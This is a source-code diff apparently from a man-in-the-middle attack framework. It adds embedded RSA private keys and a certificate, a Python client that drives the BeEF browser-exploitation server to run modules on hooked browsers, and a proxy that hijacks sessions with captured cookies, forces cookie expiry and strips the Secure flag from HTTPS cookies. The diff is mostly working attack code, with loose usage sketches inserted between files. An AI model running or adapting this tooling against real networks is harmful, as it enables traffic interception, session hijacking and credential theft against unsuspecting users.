KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
-----END RSA PRIVATE KEY-----

@ -0,0 +1,3 @@
#!/bin/bash
openssl genrsa -out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"

@ -0,0 +1,18 @@
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
u0/CRCN/lg==
-----END CERTIFICATE-----

@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
-----END RSA PRIVATE KEY-----

core/banners.py Normal file
@ -0,0 +1,82 @@
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
banner2= """
"""
banner3 = """
"""
banner4 = """
"""
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner():
return random.choice([banner1, banner2, banner3, banner4, banner5])

@ -1 +0,0 @@
Subproject commit 28d2fef986e217425cb621701f267e40425330c4

core/beefapi.py Normal file
@ -0,0 +1,367 @@
#! /usr/bin/env python2.7
# BeEF-API - A Python API for BeEF (The Browser Exploitation Framework) http://beefproject.com/
# Copyright (c) 2015-2016 Marcello Salvati - byt3bl33d3r@gmail.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import requests
import json
from UserList import UserList
class BeefAPI:
def __init__(self, opts={}):  # default must be a mapping, since opts.get() is used below
self.host = opts.get('host') or "127.0.0.1"
self.port = opts.get('port') or "3000"
self.token = None
self.url = "http://{}:{}/api/".format(self.host, self.port)
self.login_url = self.url + "admin/login"
def login(self, username, password):
try:
auth = json.dumps({"username": username, "password": password})
r = requests.post(self.login_url, data=auth)
data = r.json()
if (r.status_code == 200) and (data["success"]):
self.token = data["token"] #Auth token
self.hooks_url = "{}hooks?token={}".format(self.url, self.token)
self.modules_url = "{}modules?token={}".format(self.url, self.token)
self.logs_url = "{}logs?token={}".format(self.url, self.token)
self.are_url = "{}autorun/rule/".format(self.url)
self.dns_url = "{}dns/ruleset?token={}".format(self.url, self.token)
return True
elif r.status_code != 200:
return False
except Exception as e:
print "[BeEF-API] Error logging in to BeEF: {}".format(e)
@property
def hooked_browsers(self):
r = requests.get(self.hooks_url)
return Hooked_Browsers(r.json(), self.url, self.token)
@property
def dns(self):
r = requests.get(self.dns_url)
return DNS(r.json(), self.url, self.token)
@property
def logs(self):
logs = []
r = requests.get(self.logs_url)
for log in r.json()['logs']:
logs.append(Log(log))
return logs
@property
def modules(self):
modules = ModuleList([])
r = requests.get(self.modules_url)
for k,v in r.json().iteritems():
modules.append(Module(v, self.url, self.token))
return modules
@property
def are_rules(self):
return ARE_Rules(self.are_url, self.token)
class ModuleList(UserList):
def __init__(self, mlist):
self.data = mlist
def findbyid(self, m_id):
for m in self.data:
if m_id == m.id:
return m
def findbyname(self, m_name):
pmodules = ModuleList([])
for m in self.data:
if (m.name.lower().find(m_name.lower()) != -1) :
pmodules.append(m)
return pmodules
class SessionList(UserList):
def __init__(self, slist):
self.data = slist
def findbysession(self, session):
for s in self.data:
if s.session == session:
return s
def findbyos(self, os):
res = SessionList([])
for s in self.data:
if (s.os.lower().find(os.lower()) != -1):
res.append(s)
return res
def findbyip(self, ip):
res = SessionList([])
for s in self.data:
if ip == s.ip:
res.append(s)
return res
def findbyid(self, s_id):
for s in self.data:
if s.id == s_id:
return s
def findbybrowser(self, browser):
res = SessionList([])
for s in self.data:
if browser == s.name:
res.append(s)
return res
def findbybrowser_v(self, browser_v):
res = SessionList([])
for s in self.data:
if browser_v == s.version:
res.append(s)
return res
def findbypageuri(self, uri):
res = SessionList([])
for s in self.data:
if uri in s.page_uri:
res.append(s)
return res
def findbydomain(self, domain):
res = SessionList([])
for s in self.data:
if domain in s.domain:
res.append(s)
return res
class ARE_Rule(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
self.modules = json.loads(self.modules)
def trigger(self):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
def delete(self):
r = requests.get('{}/delete/{}?token={}'.format(self.url, self.id, self.token))
return r.json()
class ARE_Rules(object):
def __init__(self, url, token):
self.url = url
self.token = token
def list(self):
rules = []
r = requests.get('{}/list/all?token={}'.format(self.url, self.token))
data = r.json()
if (r.status_code == 200) and (data['success']):
for rule in data['rules']:
rules.append(ARE_Rule(rule, self.url, self.token))
return rules
def add(self, rule_path):
if rule_path.endswith('.json'):
headers = {'Content-Type': 'application/json; charset=UTF-8'}
with open(rule_path, 'r') as rule:
payload = rule.read()
r = requests.post('{}/add?token={}'.format(self.url, self.token), data=payload, headers=headers)
return r.json()
def trigger(self, rule_id):
r = requests.get('{}/trigger/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
def delete(self, rule_id):
r = requests.get('{}/delete/{}?token={}'.format(self.url, rule_id, self.token))
return r.json()
class Module(object):
def __init__(self, data, url, token):
self.url = url
self.token = token
for k,v in data.iteritems():
setattr(self, k, v)
@property
def options(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['options']
@property
def description(self):
r = requests.get("{}/modules/{}?token={}".format(self.url, self.id, self.token)).json()
return r['description']
def run(self, session, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, session, self.id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}, hb_ids=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"mod_id":self.id, "mod_params": options, "hb_ids": hb_ids})
r = requests.post("{}/modules/multi_browser?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def results(self, session, cmd_id):
r = requests.get("{}/modules/{}/{}/{}?token={}".format(self.url, session, self.id, cmd_id, self.token))
return r.json()
class Log(object):
def __init__(self, log_dict):
for k,v in log_dict.iteritems():
setattr(self, k, v)
class DNS_Rule(object):
def __init__(self, rule, url, token):
self.url = url
self.token = token
for k,v in rule.iteritems():
setattr(self, k, v)
def delete(self):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, self.id, self.token))
return r.json()
class DNS(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def ruleset(self):
ruleset = []
r = requests.get("{}/dns/ruleset?token={}".format(self.url, self.token))
for rule in r.json()['ruleset']:
ruleset.append(DNS_Rule(rule, self.url, self.token))
return ruleset
def add(self, pattern, resource, response=[]):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"pattern": pattern, "resource": resource, "response": response})
r = requests.post("{}/dns/rule?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def delete(self, rule_id):
r = requests.delete("{}/dns/rule/{}?token={}".format(self.url, rule_id, self.token))
return r.json()
class Hooked_Browsers(object):
def __init__(self, data, url, token):
self.data = data
self.url = url
self.token = token
@property
def online(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['online'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
@property
def offline(self):
sessions = SessionList([])
for k,v in self.data['hooked-browsers']['offline'].iteritems():
sessions.append(Session(v['session'], self.data, self.url, self.token))
return sessions
class Session(object):
def __init__(self, session, data, url, token):
self.session = session
self.data = data
self.url = url
self.token = token
self.domain = self.get_property('domain')
self.id = self.get_property('id')
self.ip = self.get_property('ip')
self.name = self.get_property('name') #Browser name
self.os = self.get_property('os')
self.page_uri = self.get_property('page_uri')
self.platform = self.get_property('platform') #Ex. win32
self.port = self.get_property('port')
self.version = self.get_property('version') #Browser version
@property
def details(self):
r = requests.get('{}/hooks/{}?token={}'.format(self.url, self.session, self.token))
return r.json()
@property
def logs(self):
logs = []
r = requests.get('{}/logs/{}?token={}'.format(self.url, self.session, self.token))
for log in r.json()['logs']:
logs.append(Log(log))
return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/modules/{}/{}?token={}".format(self.url, self.session, module_id, self.token), headers=headers, data=payload)
return r.json()
def multi_run(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps({"hb": self.session, "modules":[options]})
r = requests.post("{}/modules/multi_module?token={}".format(self.url, self.token), headers=headers, data=payload)
return r.json()
def get_property(self, key):
for k,v in self.data['hooked-browsers'].iteritems():
for l,s in v.iteritems():
if self.session == s['session']:
return s[key]
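A quick usage sketch for the client above, with the host, port and credentials taken from the [[BeEF]] section of config/mitmf.conf:

beef = BeefAPI({'host': '127.0.0.1', 'port': '3000'})
if beef.login('beef', 'beef'):
    # List the currently hooked (online) browsers
    for session in beef.hooked_browsers.online:
        print('{} {} {} {}'.format(session.ip, session.os, session.name, session.version))
    # Find a command module by (partial) name and run it against the first hook
    modules = beef.modules.findbyname('Man-In-The-Browser')
    online = beef.hooked_browsers.online
    if modules and online:
        print(modules[0].run(online[0].session, {}))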

core/configwatcher.py Normal file
@ -0,0 +1,44 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import pyinotify
import threading
from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
return ConfigObj("./config/mitmf.conf")
def process_IN_MODIFY(self, event):
self.on_config_change()
def start_config_watch(self):
wm = pyinotify.WatchManager()
wm.add_watch('./config/mitmf.conf', pyinotify.IN_MODIFY)
notifier = pyinotify.Notifier(wm, self)
t = threading.Thread(name='ConfigWatcher', target=notifier.loop)
t.setDaemon(True)
t.start()
def on_config_change(self):
""" We can subclass this function to do stuff after the config file has been modified"""
pass
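Usage is a matter of subclassing and overriding on_config_change(); a brief sketch (it assumes pyinotify is installed and ./config/mitmf.conf exists):

class ArgsWatcher(ConfigWatcher):

    def on_config_change(self):
        # Called from the watcher thread whenever config/mitmf.conf is modified
        print('config reloaded, [MITMf] args are now: {}'.format(self.config['MITMf']['args']))

watcher = ArgsWatcher()
watcher.start_config_watch()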

@ -0,0 +1,171 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse
import logging
import os
import sys
import random
import re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from core.logger import logger
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_ClientRequest", formatter)
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we don't like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
#self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
log.debug("[ClientRequest] Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'cache-control' in headers:
del headers['cache-control']
if 'host' in headers:
try:
for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]:
if headers['host'] == entry['host']:
log.info("Hijacking session for host: {}".format(headers['host']))
headers['cookie'] = entry['cookie']
except KeyError:
log.error("No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def handleHostResolvedSuccess(self, address):
log.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
path = self.getPathFromUri()
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.content:
self.content.seek(0,0)
postData = self.content.read()
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
log.debug("[ClientRequest] Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif self.urlMonitor.isSecureLink(client, url):
log.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else:
log.debug("[ClientRequest] Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
log.debug("[ClientRequest] Host resolution error: {}".format(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
log.debug("[ClientRequest] Host cached: {} {}".format(host, address))
return defer.succeed(address)
else:
return reactor.resolve(host)
def process(self):
log.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
#self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()

@ -0,0 +1,103 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straight-forward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by Javascript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitelisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
@staticmethod
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings

core/ferretng/DnsCache.py Normal file
@ -0,0 +1,45 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
class DnsCache:
'''
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
'''
_instance = None
def __init__(self):
self.customAddress = None
self.cache = {}
@staticmethod
def getInstance():
if DnsCache._instance == None:
DnsCache._instance = DnsCache()
return DnsCache._instance
def cacheResolution(self, host, address):
self.cache[host] = address
def getCachedAddress(self, host):
if host in self.cache:
return self.cache[host]
return None
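A brief usage sketch of the singleton above (the host and address are placeholders):

cache = DnsCache.getInstance()
cache.cacheResolution('www.example.org', '192.0.2.10')
print(cache.getCachedAddress('www.example.org'))  # 192.0.2.10
print(cache.getCachedAddress('unknown.host'))     # None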

@ -0,0 +1,24 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class FerretProxy(HTTPChannel):
requestFactory = ClientRequest

@ -0,0 +1,97 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from core.logger import logger
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
